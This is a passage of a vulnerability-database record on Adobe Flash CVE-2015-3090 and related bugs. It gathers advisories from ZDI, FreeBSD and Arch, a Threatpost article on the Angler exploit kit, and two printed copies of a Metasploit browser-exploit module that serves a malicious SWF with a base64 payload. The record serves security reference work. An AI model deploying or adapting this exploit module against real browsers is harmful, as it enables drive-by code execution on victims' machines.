\n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'May 12 2015', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \nos_name = target_info[:os_name] \n \nif target.name =~ /Windows/ \nplatform_id = 'win' \nelsif target.name =~ /Linux/ \nplatform_id = 'linux' \nend \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132383/adobe_flash_shader_job_overflow.rb.txt"}], "metasploit": [{"lastseen": "2018-09-04T11:49:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.", "reporter": "Rapid7", "published": "2015-06-18T17:36:14", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb", "type": "metasploit", "title": "Adobe Flash Player ShaderJob Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3090"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Great", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_SHADER_JOB_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow vulnerability related to the ShaderJob workings on\n Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the\n same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute\n of the ShaderJob after starting the job it's possible to create a buffer overflow condition\n where the size of the destination buffer and the length of the copy are controlled. This\n module has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Chris Evans', # Vulnerability discovery\n 'Unknown', # Exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-3090'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],\n ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],\n ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'May 12 2015',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb"}], "zdi": [{"lastseen": "2016-11-09T00:18:10", "references": ["https://helpx.adobe.com/security/products/reader/apsb15-10.html"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the BrokerCreateFile method. An attacker can force BrokerCreateFile to traverse the path of the output file, allowing the file to be written anywhere on disk. An attacker can leverage this vulnerability to execute code at medium integrity.", "reporter": "Nicolas Joly", "published": "2015-05-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "(Pwn2Own) Adobe Flash Player BrokerCreateFile Broker Method Path Traversal Sandbox Escape Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2015-3085"], "modified": "2015-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-216", "id": "ZDI-15-216", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2016-09-04T20:50:42", "references": ["https://trtpost-wpengine.netdna-ssl.com/files/2015/05/2015-05-28-ISC-diary-image-01.jpg", "https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/", "https://threatpost.com/older-keen-team-use-after-free-ie-exploit-added-to-angler-exploit-kit/111350", "https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396", "https://threatpost.com/adobe-unleashes-big-updates-for-flash-reader-acrobat/112756", "https://threatpost.com/exploit-for-flash-zero-day-appears-in-angler-exploit-kit/110569", "https://isc.sans.edu/forums/diary/Angler+exploit+kit+pushing+CryptoWall+30/19737/", "http://www.sfml-dev.org/documentation/2.0/classsf_1_1Shader.php", "https://threatpost.com/angler-exploit-kit-pushing-new-unnamed-ransomware/112751", "https://threatpost.com/angler-exploit-kit-bedep-malware-inflating-video-views/112611", "https://threatpost.com/patched-coldfusion-flaw-exposes-applications-to-attack/120301/", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html", "https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html", "https://threatpost.com/threatpost-news-wrap-september-2-2016/120332/", "https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904"], "edition": 1, "description": "While the Angler Exploit Kit may have already established itself as one of the more [sophisticated kits](<https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904>) on the underground market, it appears it\u2019s still finding ways to evolve.\n\nAngler, this week, was spotted dropping the latest iteration of CryptoWall ransomware and leveraging yet another previously patched Adobe vulnerability.\n\n### Related Posts\n\n#### [Threatpost News Wrap, September 2, 2016](<https://threatpost.com/threatpost-news-wrap-september-2-2016/120332/> \"Permalink to Threatpost News Wrap, September 2, 2016\" )\n\nSeptember 2, 2016 , 9:00 am\n\n#### [Patched ColdFusion Flaw Exposes Applications to Attack](<https://threatpost.com/patched-coldfusion-flaw-exposes-applications-to-attack/120301/> \"Permalink to Patched ColdFusion Flaw Exposes Applications to Attack\" )\n\nSeptember 1, 2016 , 9:15 am\n\n#### [Inside the Demise of the Angler Exploit Kit](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/> \"Permalink to Inside the Demise of the Angler Exploit Kit\" )\n\nAugust 30, 2016 , 2:25 pm\n\nEarlier this year, the kit was spotted pushing a ransomware hybrid of sorts, [a cross between TeslaCrypt and AlphaCrypt](<https://threatpost.com/angler-exploit-kit-pushing-new-unnamed-ransomware/112751>), along with a handful of Adobe exploits, and instances of the [Bedep Trojan](<https://threatpost.com/angler-exploit-kit-bedep-malware-inflating-video-views/112611>), which goes on to perpetrate click fraud.\n\nBrad Duncan, a handler at SANS Internet Storm Center claims he noticed two instances of Angler sending out Cryptowall 3.0 this week. In the first incident on Tuesday he spotted the kit dropping Bedep as a payload before it moved onto the CryptoWall 3.0. In a separate instance on Wednesday, he observed Angler sending Cryptowall 3.0 on its own.\n\nBoth times, Duncan claims, the ransomware used the same Bitcoin address for payment. Cryptowall also requested the usual figure, $500, to decrypt the victim\u2019s files.\n\n[](<https://trtpost-wpengine.netdna-ssl.com/files/2015/05/2015-05-28-ISC-diary-image-01.jpg>)\n\n\u201cI usually see Angler EK send different types of ransomware, and I\u2019ve seen plenty of CryptoWall 3.0 samples from Magnitude EK; however, this is the first time I\u2019ve noticed CryptoWall from Angler EK,\u201d Duncan wrote in a post on [SANS\u2019 InfoSec Community Forums Thursday](<https://isc.sans.edu/forums/diary/Angler+exploit+kit+pushing+CryptoWall+30/19737/>).\n\nThe exploit kit added yet another Adobe Flash Player vulnerability to its arsenal this week, [according to FireEye](<https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html>). A quartet of researchers noticed Angler exploiting CVE-2015-3090 on Tuesday, [about two weeks](<https://threatpost.com/adobe-unleashes-big-updates-for-flash-reader-acrobat/112756>) after [Adobe](<https://helpx.adobe.com/security/products/flash-player/apsb15-09.html>) actually patched the issue, a memory corruption vulnerability dug up by Chris Evans at Google\u2019s Project Zero.\n\nThe kit uses the vulnerability to exploit a race condition in the [shader class](<http://www.sfml-dev.org/documentation/2.0/classsf_1_1Shader.php>) and trigger the vulnerability, making it possible for attackers to execute arbitrary code and infect the systems of users who haven\u2019t updated yet.\n\nThe addition of Adobe exploits to Angler certainly isn\u2019t new by any means but as FireEye points out, it is worrisome.\n\n[In January ](<https://threatpost.com/exploit-for-flash-zero-day-appears-in-angler-exploit-kit/110569>)the kit added two Flash vulnerabilities, including a zero day that went onto install Bedep on victims\u2019 machines. In April the kit began exploiting CVE-2015-0359 in Flash and in March it narrowed its sights on CVE-2015-0336, also in Flash, along with [an IE vulnerability](<https://threatpost.com/older-keen-team-use-after-free-ie-exploit-added-to-angler-exploit-kit/111350>).\n\nThe kit matured further in March, adding a nifty trick called [domain shadowing](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>) wherein pilfered domain credentials are used to build lists of subdomains and then used to redirect victims to attack sites.", "reporter": "Chris Brook", "published": "2015-05-28T13:57:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "threatpost", "title": "Angler Exploit Kit Exploiting New Adobe Vulnerability, Dropping Cryptowall 3.0", "threatPostCategory": "Uncategorized", "bulletinFamily": "info", "cvelist": ["CVE-2015-3090", "CVE-2015-0359", "CVE-2015-0336"], "modified": "2015-06-01T17:43:55", "href": "https://threatpost.com/angler-exploit-kit-exploiting-new-adobe-vulnerability-dropping-cryptowall-3-0/113044/", "id": "ANGLER-EXPLOIT-KIT-EXPLOITING-NEW-ADOBE-VULNERABILITY-DROPPING-CRYPTOWALL-3-0/113044", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:42", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-06.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "11.2r202.451", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-c6-flashplugin", "operator": "le"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "11.2r202.451", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-f10-flashplugin", "operator": "le"}], "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. Adobe is aware of a report that an exploit for\n\t CVE-2015-3043 exists in the wild, and recommends users update their\n\t product installations to the latest versions.\n\t \n\n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n\t CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\n\t CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-0356).\n\t \n\n\t These updates resolve a buffer overflow vulnerability that could\n\t lead to code execution (CVE-2015-0348).\n\t \n\n\t These updates resolve use-after-free vulnerabilities that could lead\n\t to code execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n\t CVE-2015-3039).\n\t \n\n\t These updates resolve double-free vulnerabilities that could lead to\n\t code execution (CVE-2015-0346, CVE-2015-0359).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-0357, CVE-2015-3040).\n\t \n\n\t These updates resolve a security bypass vulnerability that could\n\t lead to information disclosure (CVE-2015-3044).\n\t \n\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2015-04-14T00:00:00", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-14T00:00:00", "id": "3364D497-E4E6-11E4-A265-C485083CA99C", "href": "https://vuxml.freebsd.org/freebsd/3364d497-e4e6-11e4-a265-c485083ca99c.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "references": ["https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0355", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3043", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3041", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0349", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0360", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0359", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0358", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3040", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0354", "https://helpx.adobe.com/security/products/flash-player/apsb15-06.html", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3044", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0357", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0348", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0346", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3039", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0350", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0353", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0352", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0356", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3042", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0351", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3038", "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0347"], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "11.2.202.457-1", "packageName": "flashplugin", "arch": "any", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "- CVE-2015-0346 (arbitrary code execution)\n\nA double-free vulnerability allows attackers to execute arbitrary code\nvia unspecified vectors.\n\n- CVE-2015-0347 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0348 (arbitrary code execution)\n\nA buffer overflow vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0349 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0350 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0351 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0352 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0353 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0354 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0355 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-0356 (arbitrary code execution)\n\nA type confusion vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0357 (ASLR protection bypass)\n\nFlash does not properly restrict discovery of memory addresses, which\nallows attackers to bypass the ASLR protection mechanism via unspecified\nvectors.\n\n- CVE-2015-0358 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-0359 (arbitrary code execution)\n\nA double-free vulnerability allows attackers to execute arbitrary code\nvia unspecified vectors.\n\n- CVE-2015-0360 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3038 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3039 (arbitrary code execution)\n\nA use-after-free vulnerability that could lead to arbitrary code\nexecution via unspecified vectors.\n\n- CVE-2015-3040 (ASLR protection bypass)\n\nFlash does not properly restrict discovery of memory addresses, which\nallows attackers to bypass the ASLR protection mechanism via unspecified\nvectors.\n\n- CVE-2015-3041 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3042 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3043 (arbitrary code execution)\n\nMemory corruption vulnerability that could lead to arbitrary code\nexecution or cause a denial of service via unspecified vectors.\n\n- CVE-2015-3044 (information disclosure)\n\nAttackers are able to bypass intended access restrictions and obtain\nsensitive information via unspecified vectors.", "reporter": "Arch Linux", "published": "2015-04-17T00:00:00", "title": "flashplugin: multiple issues", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "archlinux", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-17T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-April/000297.html", "id": "ASA-201504-18", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
